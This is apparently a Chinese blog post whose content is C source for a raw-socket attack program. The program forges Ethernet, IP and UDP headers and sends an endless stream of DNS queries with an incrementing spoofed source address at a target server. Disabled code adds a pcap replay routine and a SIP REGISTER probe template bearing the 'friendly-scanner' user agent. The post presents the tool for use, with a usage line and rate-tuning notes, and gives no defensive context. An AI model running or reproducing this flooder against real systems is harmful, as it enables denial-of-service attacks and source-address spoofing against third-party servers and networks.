博客地址:http://home.cnblogs.com/u/zengjianrong/
代码没有做好精简,有些多余的没有删去,因为博主太懒了哈哈
#include <stdio.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/time.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/if_ether.h> #include <net/if_arp.h> #include <netinet/in.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <unistd.h> #include <pthread.h> #include <sys/socket.h> #include <sys/stat.h> #include <arpa/inet.h> #include <fcntl.h> #include <sys/ioctl.h> #define WORD unsigned short #define DWORD unsigned long typedef struct ip_hdr { unsigned char ip_verlen; // IP version & length unsigned char ip_tos; // IP type of service unsigned short ip_totallength; // Total length unsigned short ip_id; // Unique identifier unsigned short ip_offset; // Fragment offset field unsigned char ip_ttl; // Time to live unsigned char ip_protocol; // Protocol(TCP, UDP, etc.) unsigned short ip_checksum; // IP checksum unsigned int ip_srcaddr; // Source address unsigned int ip_destaddr; }IP_HDR; typedef struct tcp_hdr { unsigned short sport; unsigned short dport; unsigned int seqnum; unsigned int acknum; unsigned char DataOffset; unsigned char Flags; unsigned short Windows; unsigned short Checksum; unsigned short UrgPointer; }TCP_HDR; typedef struct udp_head { unsigned short sport; unsigned short dport; unsigned short len; unsigned short Checksum; }UDP_HDR; typedef struct ps_hdr { unsigned int source_address; unsigned int dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; }PS_HDR; typedef struct { unsigned short id; //标识,通过它客户端可以将DNS的请求与应答相匹配; unsigned short flags; //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序 unsigned short questions; //问题数目 unsigned short answers; //资源记录数目 unsigned short author; //授权资源记录数目 unsigned short addition; //额外资源记录数目 }DNS_HDR; #define MAX_BUF_LEN 30*1024*1024 int socketid = -1; unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char*)buffer; } cksum = (cksum>>16)+(cksum&0xffff); cksum += (cksum>>16); return (unsigned short)(~cksum); } void makerawpacket(unsigned char *buffer, int len, unsigned char *ucSIp, unsigned char *ucDIp, unsigned int k) { IP_HDR ipheader; TCP_HDR tcp_header; UDP_HDR udp_header; DNS_HDR dns_header; unsigned long dwFromIP = inet_addr(ucSIp); unsigned long dwToIP = inet_addr(ucDIp); dwFromIP += htonl(k); char tcpCheckBuf[2048]; PS_HDR pseudo_header; memcpy(&ipheader,buffer+14,sizeof(IP_HDR)); ipheader.ip_srcaddr=(dwFromIP); ipheader.ip_destaddr=dwToIP; ipheader.ip_checksum = 0xffff; ipheader.ip_checksum=checksum((unsigned short *)&ipheader,20); memcpy(&udp_header,buffer+14+sizeof(IP_HDR),sizeof(UDP_HDR)); udp_header.Checksum= 0xffff; pseudo_header.source_address =ipheader.ip_srcaddr ; pseudo_header.dest_address =ipheader.ip_destaddr ; pseudo_header.placeholder = 0; pseudo_header.protocol = 0x11; pseudo_header.tcp_length = htons(sizeof(udp_header)+len); memcpy(tcpCheckBuf,&pseudo_header,sizeof(pseudo_header)); memcpy(tcpCheckBuf+sizeof(pseudo_header),&udp_header,sizeof(udp_header)); memcpy(tcpCheckBuf+sizeof(pseudo_header)+sizeof(udp_header),buffer+14+sizeof(ipheader)+sizeof(udp_header),len); udp_header.Checksum = checksum((unsigned short*)(tcpCheckBuf),sizeof(pseudo_header)+sizeof(udp_header)+len); memcpy(buffer+14,&ipheader,sizeof(ipheader)); memcpy(buffer+14+sizeof(ipheader),&udp_header,sizeof(udp_header)); } #if 0 /* Modified by zengjianrong on 2014年12月15日14时 */ int nSendAttackPacketFromPcap(FILE *fp) { int nGetLen = 0; static int RetLen = 0; int CheckIndex = 0; static unsigned char *readbuf; int i; unsigned char MacBuf[16] = {/*main mac*/0x00 ,0x21 ,0xf2 ,0x00 ,0x00 ,0x06,/*extend mac*/0x78 ,0x8c ,0x54 ,0x33 ,0xbb ,0x7b,0x08,0x00}; IP_HDR iphead; UDP_HDR udphead; unsigned char sendBuf[1500]; int sendlen = 0; struct sockaddr addr; int nPacket = 0; unsigned char RealMacBuf[16] = {/*main mac*/0x00,0x21,0xF2,0x00,0x0A,0x29,/*extend mac*/0x00,0x0C,0x29,0x66,0xB0,0x45,0x08,0x00}; static int firstcall = 0; #if 1 /*Modified by kcr, 2014-11-24*/ if (0==firstcall) { printf("nSendAttackPacketFromPcap first call "); readbuf = malloc(MAX_BUF_LEN); if (NULL==readbuf) return -1; RetLen = fread(readbuf,1,MAX_BUF_LEN,fp); printf("read %d ",RetLen); fclose(fp); } firstcall = 1; memcpy(sendBuf,RealMacBuf,14); CheckIndex = 0; while(CheckIndex<(RetLen-14)) { /*printf("%02x ",readbuf[CheckIndex]);*/ /*Modified by kcr,2014-11-13*/ if (readbuf[CheckIndex]!=MacBuf[0]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[1]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[2]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[3]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[4]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[5]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[6]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[7]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[8]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[9]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[10]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[11]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[12]) { CheckIndex++; continue; } CheckIndex++; if (readbuf[CheckIndex]!=MacBuf[13]) { CheckIndex++; continue; } CheckIndex++; nPacket++; /*MAC match*/ memset(&iphead,0,sizeof(IP_HDR)); memset(&udphead,0,sizeof(UDP_HDR)); memcpy(&iphead,&readbuf[CheckIndex],sizeof(IP_HDR)); CheckIndex += sizeof(IP_HDR); memcpy(&udphead,&readbuf[CheckIndex],sizeof(UDP_HDR)); CheckIndex += sizeof(UDP_HDR); udphead.sport = htons(4444); memcpy(sendBuf,RealMacBuf,14); memcpy(sendBuf+14,&iphead,sizeof(IP_HDR)); memcpy(sendBuf+14+sizeof(IP_HDR),&udphead,sizeof(UDP_HDR)); sendlen = ntohs(udphead.len)-8; memcpy(sendBuf+14+sizeof(IP_HDR)+sizeof(UDP_HDR),&readbuf[CheckIndex],sendlen); CheckIndex += sendlen; makerawpacket(sendBuf,sendlen, 0, 0, 0); memset(&addr, 0, sizeof(addr)); strcpy(addr.sa_data, "eth2"); if (sendto(socketid, sendBuf, 14+sizeof(IP_HDR)+sizeof(UDP_HDR)+sendlen, 0, &addr, sizeof(addr)) < 0) { } usleep(20000); } return nGetLen; #else "REGISTER sip:61.144.88.146 SIP/2.0 Via: SIP/2.0/UDP 5.196.76.190:8051;branch=z9hG4bK-4185558597;rport Content-Length: 0 From: "7608" <sip:7608@61.144.88.146>;tag=%10d Accept: application/sdp User-Agent: friendly-scanner To: "7608" <sip:7608@61.144.88.146> Contact: sip:123@1.1.1.1 CSeq: 1 REGISTER Call-ID: %10d Max-Forwards: 70 " #endif /*End of Modified by kcr*/ /*free(readbuf);*/ /*Modified by kcr,2014-10-16*/ } #endif /* #if 0, End of Modified by zengjianrong on 2014年12月15日14时 */ int vp_CreatTask(void (*funcptr)(),void *argv) { pthread_attr_t attr; int ret; size_t stacksize = 0; int tid; struct sched_param prv_priority; int sched_policy; int error; memset(&attr,0,sizeof(pthread_attr_t)); ret=pthread_attr_init(&attr); stacksize = /*PTHREAD_STACK_MIN*3*/256*1024; ret = pthread_attr_setstacksize(&attr, stacksize); #if 0 /*Modified by kcr, 2014-03-12*/ pthread_attr_getschedparam( &attr, &prv_priority); sched_policy = SCHED_FIFO; pthread_attr_setschedpolicy( &attr, sched_policy ); prv_priority.sched_priority = 97; pthread_attr_setschedparam( &attr, &prv_priority); #endif /*End of Modified by kcr*/ ret = pthread_create((pthread_t *)&tid,&attr,(void *)funcptr, argv); return ret; } int nSendAttackPacket(unsigned char *ucSIp, unsigned char *ucDIp, unsigned char *RealMacBuf, unsigned int unMaxCnt) { int nGetLen = 0; int CheckIndex = 0; unsigned int k; IP_HDR iphead; UDP_HDR udphead; DNS_HDR dns_header; unsigned char dnsQueries[29]={ /*08 6c 65 61 73 65 77 65 62 03 63 6f 6d 00 00 01 00 01*/ 0x08, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x77, 0x65, 0x62, 0x03, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x29, 0x23, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; unsigned char sendBuf[1500]; int sendlen = 0; struct sockaddr addr; int nPacket = 0; unsigned int unCnt = 0; unsigned int unCnt_2 = 0; memcpy(sendBuf,RealMacBuf,14); memset(&iphead,0,sizeof(IP_HDR)); iphead.ip_verlen = 0x45; iphead.ip_tos = 0; iphead.ip_totallength = htons(0x45); iphead.ip_id = htons(0x9045); iphead.ip_offset = 0; iphead.ip_ttl = 130; iphead.ip_protocol = 17; /* udp */ memset(&udphead,0,sizeof(UDP_HDR)); udphead.sport = htons(4444); udphead.dport = htons(0x35); /* dns */ udphead.len = htons(0x31); udphead.Checksum = 0x0; memset(&dns_header, 0, sizeof(DNS_HDR)); dns_header.id = htons(0xd2ce); dns_header.flags = htons(0x0100); //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序 dns_header.questions = htons(1); //问题数目 dns_header.answers = 0; //资源记录数目 dns_header.author = 0; //授权资源记录数目 dns_header.addition = htons(1); memcpy(sendBuf,RealMacBuf,14); memcpy(sendBuf+14,&iphead,sizeof(IP_HDR)); memcpy(sendBuf+14+sizeof(IP_HDR),&udphead,sizeof(UDP_HDR)); memcpy(sendBuf+14+sizeof(IP_HDR)+sizeof(UDP_HDR), &dns_header, sizeof(dns_header)); memcpy(sendBuf+14+sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header), &dnsQueries, sizeof(dnsQueries)); memset(&addr, 0, sizeof(addr)); strcpy(addr.sa_data, "eth1"); k=0; //printf("func:%s,line:%d, delay Cnt=0x%x ", __FUNCTION__, __LINE__, unMaxCnt); while (1) { makerawpacket(sendBuf,sizeof(dns_header)+29, ucSIp, ucDIp, k); k++; if (sendto(socketid, sendBuf, 14+sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header)+29, 0, &addr, sizeof(addr)) < 0) { } //usleep(20); #if 1 /* Modified by zengjianrong on 2014年12月12日17时 */ unCnt = 0; while(unMaxCnt > unCnt) { unCnt ++; } #endif /* #if 0, End of Modified by zengjianrong on 2014年12月12日17时 */ } return 0; /*free(readbuf);*/ /*Modified by kcr,2014-10-16*/ } void RecvRespond(void) { int socket_fd; unsigned char Buf[2048]; struct sockaddr_in LocalAddr; struct sockaddr_in RemoteAddr; fd_set recset; struct timeval wait; int nBytes; int RemoteAddrLen =sizeof(struct sockaddr_in); socket_fd = socket(AF_INET, SOCK_DGRAM, 0); memset(&LocalAddr, 0, sizeof(struct sockaddr_in)); LocalAddr.sin_family = AF_INET; LocalAddr.sin_addr.s_addr = htonl(INADDR_ANY); LocalAddr.sin_port = htons(4444); bind(socket_fd, (struct sockaddr *)&(LocalAddr), sizeof(struct sockaddr)); while(1) { memset(&recset, 0, sizeof(fd_set)); FD_SET(socket_fd, &recset); memset(&RemoteAddr, 0, sizeof(struct sockaddr_in)); wait.tv_sec = 2; wait.tv_usec = 0; nBytes = select(FD_SETSIZE, &recset, 0, 0, &wait); if(nBytes>0) { nBytes = recvfrom(socket_fd,Buf,1024,0, (struct sockaddr *)&RemoteAddr,&RemoteAddrLen); } } } void str2mac(unsigned char *ucInput, unsigned char *ucOutput) { unsigned char ucTemp = 0; int i = 0, j = 0, k = 0; do { //printf("func:%s,line:%d,0x%x. ", __FUNCTION__, __LINE__, ucInput[i]); if ((':' == ucInput[i]) || ('�' == ucInput[i])) { ucOutput[j] = ucTemp; j ++; k = 0; } else { if (0 == k) { if (ucInput[i]>='0' && ucInput[i] <= '9') ucTemp = ucInput[i] - '0'; else ucTemp = ucInput[i] - 'a' + 10; } else { if (ucInput[i]>='0' && ucInput[i] <= '9') ucTemp = (ucTemp<<4) | (ucInput[i] - '0'); else ucTemp = (ucTemp<<4) | (ucInput[i] - 'a' + 10); } k = 1; } }while ('�' != ucInput[i++]); } /* Delay = 100000000,大约为4个, Delay = 10000000,大约为40个, Delay = 1000000,大约为360个, Delay = 100000,大约为2930个, Delay = 10000,大约为6500个, Delay = 0,大约为5w多个, */ int main(int argc,void *argv[]) { int optval = 1; unsigned char RealMacBuf[16]; #if 0 /* Modified by zengjianrong on 2014年12月2日15时 */ FILE *fp; if(argc<2) return ; printf("open file %s ",argv[1]); fp = fopen(argv[1],"rb+"); if(NULL==fp) { printf("Can't open file %s ",argv[1]); return 0; } #endif /* #if 0, End of Modified by zengjianrong on 2014年12月2日15时 */ if (6 > argc) { printf("eg.: ./attack sip smac dip dmac delay "); return -1; } memset(RealMacBuf, 0, 16); str2mac(argv[2], &(RealMacBuf[6])); str2mac(argv[4], RealMacBuf); RealMacBuf[12] = 0x08; RealMacBuf[13] = 0x00; printf("create socket "); if ((socketid = socket (PF_PACKET, SOCK_PACKET, htons(0x800))) == -1) { return -1; } printf("set SO_BROADCAST "); if (setsockopt(socketid, SOL_SOCKET, SO_BROADCAST, &optval, sizeof(optval)) == -1) { close(socketid); return -1; } vp_CreatTask(RecvRespond,0); while(1) { nSendAttackPacket(argv[1], argv[3], RealMacBuf, strtoul(argv[5], NULL, 10)); /*printf("loop back ");*/ /*Modified by kcr,2014-11-24*/ //usleep(100000); /*Modified by kcr,2014-11-13*/ } }